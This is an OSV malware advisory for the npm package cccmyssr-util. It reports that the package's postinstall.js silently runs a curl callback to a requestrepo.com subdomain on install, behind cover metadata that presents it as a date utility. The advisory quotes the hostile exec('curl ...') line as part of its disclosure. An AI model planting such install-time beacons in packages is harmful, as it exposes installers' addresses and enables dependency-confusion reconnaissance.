cccmyssr-util@1.0.0

Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 2:40 AM UTC

Malicious

OSV ID: MAL-2026-6390

Ecosystem: npm

Summary

On npm install, the package's postinstall.js unconditionally executes exec('curl http://qvmjcw4s.requestrepo.com'), sending an HTTP callback to a unique subdomain on requestrepo.com — a public out-of-band HTTP/DNS interaction service commonly used to confirm successful code execution on a target. The callback discloses the installer's public IP and a successful-install signal to the listener controlled by whoever registered the subdomain. The package presents itself as a trivial date-formatting utility (index.js exports a one-line formatDate), with empty author metadata and a generic "A harmless utility package" description; there is no legitimate rationale for any install-time network I/O. The cover-story metadata combined with an unconditional install-time beacon to an OOB inspection endpoint matches the reconnaissance/dependency-confusion probe pattern.

Source: amazon-inspector (99d23c8f1194f89f1b52e986cd57ca9c0fbd739a6565eb33c972f4fbaf0966e7)
